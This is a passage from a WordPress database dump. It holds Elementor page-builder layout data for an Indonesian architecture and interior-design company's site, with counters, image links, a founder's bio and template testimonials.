5589\",\"phone_address\":\"082297775589\"}],\"alignment\":\"center\",\"label_color\":\"#FFFFFF\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"label_typography_font_weight\":\"700\",\"label_margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display\":\"inline-flex\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"700\",\"info_color\":\"#E3B25A\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display_mobile\":\"inline-block\",\"alignment_mobile\":\"center\",\"info_item_alignment_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"1dbd858\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact with us\",\"background_color\":\"#FFFFFF\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"38\",\"bottom\":\"18\",\"left\":\"38\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"typography_line_height\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"button_text_color\":\"#2D2D2D\",\"hover_color\":\"#FFFFFF\",\"button_bg_hover\":\"#E3B25A\",\"_animation\":\"none\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a9e80df\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-66\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"c5b31d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1ecd2ea\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"40\",\"box_shadow_box_shadow_type\":\"yes\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":10,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.1)\"},\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"50\",\"bottom\":\"40\",\"left\":\"50\",\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-110\",\"left\":0,\"isLinked\":false},\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-couter.png\",\"id\":3570,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"%\",\"size\":-290,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":120,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":53,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":71,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"30\",\"bottom\":\"40\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[{\"id\":\"617f43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ac2aeba\",\"elType\":\"widget\",\"settings\":{\"title\":\"Project Completed\",\"icon\":{\"value\":\"flaticon flaticon-architect-1\",\"library\":\"flaticon\"},\"number\":6800},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"431e0f1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"da1e266\",\"elType\":\"widget\",\"settings\":{\"title\":\"Architectures\",\"number\":906,\"icon\":{\"value\":\"flaticon flaticon-architect\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"5255259\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"083da50\",\"elType\":\"widget\",\"settings\":{\"title\":\"Service providing\",\"number\":200,\"icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"944a539\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"d0e2ce9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Happy customers\",\"number\":9760,\"icon\":{\"value\":\"flaticon flaticon-satisfaction\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4388608\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b6b9eaa\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a2ebcc\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our Architects\",\"title\":\"Our expert team\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"9d2f9e3\",\"elType\":\"widget\",\"settings\":{\"info_background_background\":\"classic\",\"info_background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-lines-team.png\",\"id\":937,\"alt\":\"\",\"source\":\"library\"},\"info_background_position\":\"top right\",\"info_background_repeat\":\"no-repeat\",\"total_count\":6,\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"ova_team\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7836724\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b90ed21\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b88a577\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01.png\",\"id\":752,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ad43d0d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"35d31c6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02.png\",\"id\":753,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0eaabe3\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4c51b79\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03.png\",\"id\":754,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ee06889\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"02c4aae\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04.png\",\"id\":755,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c6b5264\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"c3c96cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05.jpg.png\",\"id\":757,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6720e69\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"77fc613\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06.png\",\"id\":756,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(3950,4882,'_elementor_page_assets','a:1:{s:6:\"styles\";a:4:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";}}'),(3951,4882,'_elementor_pro_version','3.8.1'),(3959,4884,'_wp_attached_file','2023/09/file-1.jpg'),(3960,4884,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:512;s:6:\"height\";i:512;s:4:\"file\";s:18:\"2023/09/file-1.jpg\";s:8:\"filesize\";i:15508;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"file-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6901;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"file-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2822;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:18:\"file-1-390x473.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13055;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:18:\"file-1-378x512.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15636;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:18:\"file-1-512x473.jpg\";s:5:\"width\";i:512;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15264;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(3961,4885,'_wp_page_template','elementor_header_footer'),(3962,4885,'_elementor_edit_mode','builder'),(3963,4885,'_elementor_template_type','wp-page'),(3964,4885,'_elementor_version','3.8.1'),(3965,4885,'_elementor_data','[{\"id\":\"013ca3e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-section-1.png\",\"id\":3589,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center right\",\"background_repeat\":\"no-repeat\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false},\"background_position_tablet\":\"top right\",\"background_size\":\"auto\",\"gap\":\"no\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"b6a844e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50.684,\"_inline_size_tablet\":100,\"align\":\"flex-end\",\"align_tablet\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-right\",\"animation_tablet\":\"none\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"56708b8\",\"elType\":\"widget\",\"settings\":{\"template\":\"template_2\",\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-get-to-know-us.jpg\",\"id\":710,\"alt\":\"\",\"source\":\"library\"},\"show_line_left\":\"yes\",\"text_left\":\"Architect\",\"text_left_margin\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"image_width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_height_mobile\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"line_width_left_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"1829eb5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":49.316,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-left\",\"animation_tablet\":\"none\"},\"elements\":[{\"id\":\"2733af6\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"\",\"title\":\"John Alan\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"13\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"dcb995a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Pengusaha di bidang kontraktor, konsultan interior design, property developer, hotel dan F&amp;B yang telah berpengalaman sejak tahun 2005.<\\/p><p>Selain sebagai pengusaha, John Alan juga merupakan business coach yang aktif dalam mengembangkan komunitas wirausaha dan telah berkolaborasi dengan para pakar di berbagai industri.<\\/p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.<\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2eb768f\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Konsultasi perencanaan & interior design\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"ced22e0\"},{\"text\":\"Penyusunan Rencana Anggaran Belanja\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"Produksi furniture dan pekerjaan sipil\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"space_between\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"space_between_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.4,\"sizes\":[]},\"icon_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"f3caa1a\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\"},\"elements\":[{\"id\":\"697046f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":20},\"elements\":[{\"id\":\"4b2c591\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/09\\/john_allan.jpg\",\"id\":4839,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"_element_width\":\"auto\",\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"_border_color\":\"#E3B25A\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"9b875c0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":79.92,\"space_between_widgets\":10},\"elements\":[{\"id\":\"1150f91\",\"elType\":\"widget\",\"settings\":{\"title\":\"John Alan\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"header_size\":\"h3\",\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"23ae2ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"CO - FOUNDER\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e8e90de\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5b19198\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"d460dea\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking about BauHaus\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"da0b416\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"11f956f\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"d232423\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#E3B25A\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"8056628\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/avatar.jpg\",\"id\":718,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\",\"_id\":\"51a9c88\"}],\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9c560b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"63f0bcf\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9b446cc\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"94218cd\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"9ac0b32\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"f80af3e\"}],\"background_item_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"-15\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"bounceInUp\",\"_animation_tablet\":\"none\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"dot_control\":\"yes\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5079813\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-contact-with-us.jpg\",\"id\":2653,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#242424\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.8,\"sizes\":[]},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"170\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4971895\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":30},\"elements\":[{\"id\":\"22aaaa7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Let\'s turn your ideas\\ninto reality\",\"align\":\"center\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"800\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"16\",\"bottom\":\"0\",\"left\":\"16\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_element_custom_width\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":42,\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fe7bd92\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"\",\"library\":\"\"},\"label\":\"Get your quote or WhatsApp: 